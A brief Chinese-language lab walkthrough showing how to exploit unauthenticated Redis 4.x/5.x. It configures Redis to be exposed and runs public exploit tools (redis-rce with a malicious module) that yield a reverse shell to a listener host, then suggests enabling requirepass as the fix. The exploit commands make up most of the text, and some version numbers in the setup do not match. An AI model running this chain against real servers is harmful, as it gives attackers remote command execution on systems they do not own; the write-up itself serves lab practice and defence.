Redis 4.x 5.x 未授权访问
环境搭建
5.0版本下载
wget http://download.redis.io/releases/redis-5.0.5.tar.gz
tar xzf redis-5.0.0.tar.gz
cd redis-5.0.5
make
修改配置文件运行远程访问
1、将redis.conf文件中的bind 127.0.0.1 这行前面加注释(#); 2、将redis.conf文件中的 protected-mode yes 改为no;
运行Redis
./redis-server /root/redis/redis-5.0.0/redis.conf
下载EXP
git clone [url]https://github.com/Ridter/redis-rce.git[/url] git clone [url]https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git[/url]
编译module.so文件:
将编译完的module.so复制到redis-rce目录下,然后执行以下命令:
python redis-rce.py -r 127.0.0.1 -L 127.0.0.1 -f module.so
-r参数是指远程Redis IP地址; -L参数是指反弹到的服务器IP地址; 执行命令后,开启监听了本地的60720端口,并成功反弹回了shell。
修复建议
这是针对redis未授权访问的漏洞 这里直接redis.conf文件里面的 requirepass 参数取消注释 这里5.0是默认开启未授权访问的